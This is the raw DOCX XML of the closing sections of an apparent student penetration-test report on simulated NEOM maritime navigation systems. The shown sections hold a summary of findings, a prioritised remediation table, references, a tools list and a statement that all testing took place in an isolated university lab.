          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Maritime Navigation Systems of the NEOM Smart City Platform exhibit a critically inadequate security posture. Of the 20 vulnerabilities identified, 8 are Critical and 10 are High severity. The practical exploitation phase demonstrated that five vulnerabilities could be chained together to achieve full control over maritime operations infrastructure — including real-time vessel tracking manipulation, database extraction, and physical SCADA disruption.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Weaknesses:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete absence of encryption on AIS communications and SCADA Modbus protocols</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No network segmentation between Operational Technology (OT) and IT environments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple systems operating with factory-default or trivially guessable credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical web application vulnerabilities: SQL Injection, IDOR, unauthenticated APIs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS zone transfer misconfiguration exposing complete internal infrastructure map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No centralized logging, SIEM, or audit trail for any critical system access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate remediation of all Critical and High severity findings is mandatory. A Zero-Trust Architecture should be adopted across all maritime systems, alongside full compliance with IMO MSC-FAL.1/Circ.3 and BIMCO cybersecurity guidelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">12.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1500"/>
        <w:gridCol w:w="5580"/>
        <w:gridCol w:w="1900"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="38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15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558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Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Fixes Flaws</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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IMMEDIATE</w:t>
            </w:r>
          </w:p>
        </w:tc>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Disable Telnet (port 23) — replace with SSH + key-based authentication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#9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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IMMEDIATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Restrict VTS Dashboard to internal network + enforce mandatory VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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#7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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IMMEDIATE</w:t>
            </w:r>
          </w:p>
        </w:tc>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Implement AIS digital authentication + encryption protocol</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#2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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IMMEDIATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Encrypt SCADA Modbus/DNP3 with TLS + implement write authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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#17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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IMMEDIATE</w:t>
            </w:r>
          </w:p>
        </w:tc>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 SQL Injection with Parameterized Queries + deploy WAF</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 #13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Segment OT and IT networks with Firewall + DMZ architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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#8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Enforce MFA on all administrative and remote access interfaces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#9, #10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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8</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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Integrate GPS with INS to resist spoofing attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Implement object-level authorization checks on all API endpoints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#14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Deploy centralized SIEM solution for real-time monitoring and logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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#19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Restrict DNS zone transfers to authorised secondary servers only</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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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12</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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Establish OTA Firmware Update Policy for all marine IoT devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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#18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Encrypt all sensitive database fields with AES-256 + Key Management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r>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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14</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MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Implement file upload validation: type check, AV scan, sandboxing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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#15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">13. Appendix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">13.1 Standards &amp; References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IMO Resolution MSC-FAL.1/Circ.3 — Maritime Cyber Risk Management Guidelines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">BIMCO Guidelines on Cyber Security Onboard Ships — Version 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 — 2021 Edition — owasp.org/Top10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST SP 800-115 — Technical Guide to Information Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PTES — Penetration Testing Execution Standard — pentest-standard.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Google Hacking Database (GHDB) — exploit-db.com/google-hacking-database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">NEOM Vision 2030 Smart City Platform — neom.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">13.2 Course Materials Referenced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CYBS 3306 Chapter 7: Families of Attacks — University of Hafr Al-Batin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CYBS 3306 Chapter 9: Enumeration and Footprinting — University of Hafr Al-Batin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">13.3 Tools Documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap — nmap.org/docs.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark — wireshark.org/docs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework — docs.metasploit.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite — portswigger.net/burp/documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">theHarvester — github.com/laramies/theHarvester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Shodan — shodan.io</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">13.4 Legal &amp; Ethical Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All penetration testing activities described in this report were conducted exclusively within a simulated, isolated academic lab environment at the University of Hafr Al-Batin. No real production systems were accessed or harmed. All techniques were performed under full academic authorisation and in accordance with the legal and ethical boundaries defined in CYBS 3306 Chapter 7. As stated in the course material: the only difference between an authorised penetration test and illegal unauthorised access is a signed written authorisation document.</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4"/>
      <w:szCs w:val="34"/>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2026-05-19T04:54:44.057Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-19T04:54:44.074Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>